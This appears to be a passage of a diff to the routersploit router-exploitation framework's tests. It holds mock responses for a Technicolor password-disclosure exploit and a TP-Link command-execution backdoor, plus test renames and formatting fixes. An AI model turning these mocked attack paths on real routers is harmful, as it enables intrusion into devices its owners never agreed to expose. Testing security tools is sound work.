AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAc3lzIGZlYXR1cmUgdHIwNjkgMQpzeXMgZXJyY3RsIDANCnN5cyB0cmNsIGxldmVsIDUNCnN5cyB0cmNsIHR5cGUgMTE4MA0Kc3lzIHRyY3AgY3IgNjQgOTYNCnN5cyB0cmNsIHN3IG9mZgpzeXMgdHJjcCBzdyBvZmYKaXAgdGNwIG1zcyA1MTINCmlwIHRjcCBsaW1pdCAyDQppcCB0Y3AgaXJ0dCA2NTAwMA0KaXAgdGNwIHdpbmRvdyAyDQppcCB0Y3AgY2VpbGluZyA2MDAwDQppcCByaXAgYWN0aXZhdGUNCmlwIHJpcCBtZXJnZSBvbg0KaXAgaWNtcCBkaXNjb3ZlcnkgZW5pZjAgb2ZmCnBwcCBpcGNwIGNvbXByZXNzIG9mZgpzeXMgd2RvZyBzdyBvbgpzeXMgcXVpY2sgZW5hYmxlCndhbiBhZHNsIHJhdGUgb2ZmCmYKZQp3YW4gYWRzbCByYXRlIG9mZgoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//w==")
def test_check_success(target):
""" Test scenario - successful check """
......
......@@ -5,8 +5,11 @@ from routersploit.modules.exploits.routers.technicolor.tc7200_password_disclosur
def test_check_success(target):
""" Test scenario - successful exploitation """
encrypted_mock = binascii.unhexlify('F29000B62A499FD0A9F39A6ADD2E7780' # encrypted zero block + data from https://www.exploit-db.com/exploits/31894/
+'c07fdfca294e1a4e4b74dbb2ffb7d2a73a90f00111134dc8d9810a90f2a9bf5862a179a20a9418a486bd4c8170730c8f')
encrypted_mock = binascii.unhexlify(
"F29000B62A499FD0A9F39A6ADD2E7780" # encrypted zero block + data from https://www.exploit-db.com/exploits/31894/
"c07fdfca294e1a4e4b74dbb2ffb7d2a73a90f00111134dc8d9810a90f2a9bf5862a179a20a9418a486bd4c8170730c8f"
)
route_mock = target.get_route_mock("/goform/system/GatewaySettings.bin", methods=["GET"])
route_mock.return_value = (
encrypted_mock
......
......@@ -5,7 +5,7 @@ from routersploit.modules.exploits.routers.tplink.wdr740nd_wdr740n_backdoor impo
def apply_response(*args, **kwargs):
cmd = request.args["cmd"]
data = 'TEST; var cmdResult = new Array(\n"'+cmd+'",\n0,0 ); TEST'
data = 'TEST; var cmdResult = new Array(\n"' + cmd + '",\n0,0 ); TEST'
return data, 200
......
......@@ -11,7 +11,6 @@ def test_check_success(target):
"TEST"
)
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
......
......@@ -13,7 +13,6 @@ def test_check_success(mocked_shell, target):
"TEST"
)
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
......
......@@ -13,7 +13,6 @@ def test_check_success(mocked_shell, target):
"TEST"
)
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
......
......@@ -11,7 +11,6 @@ def test_check_success(target):
"TEST\n"
)
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
......
......@@ -33,7 +33,7 @@ def test_exploit_not_found_response(not_found_target, module):
@pytest.mark.parametrize("module", iter_modules(directory))
def test_exploit_empty_response(error_target, module):
def test_exploit_error_response(error_target, module):
exploit = module()
exploit.target = error_target.host
exploit.port = error_target.port
......@@ -42,7 +42,7 @@ def test_exploit_empty_response(error_target, module):
@pytest.mark.parametrize("module", iter_modules(directory))
def test_exploit_empty_response(redirect_target, module):
def test_exploit_redirect_response(redirect_target, module):
exploit = module()
exploit.target = redirect_target.host
exploit.port = redirect_target.port
......
......@@ -25,7 +25,7 @@ def test_exploit_info(exploit):
@pytest.mark.parametrize("creds", iter_modules("./routersploit/modules/creds"))
def test_exploit_info(creds):
def test_creds_info(creds):
info = creds._Exploit__info__
assert isinstance(info, dict)
......@@ -44,7 +44,7 @@ def test_exploit_info(creds):
@pytest.mark.parametrize("scanner", iter_modules("./routersploit/modules/scanners"))
def test_exploit_info(scanner):
def test_scanner_info(scanner):
info = scanner._Exploit__info__
assert isinstance(info, dict)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment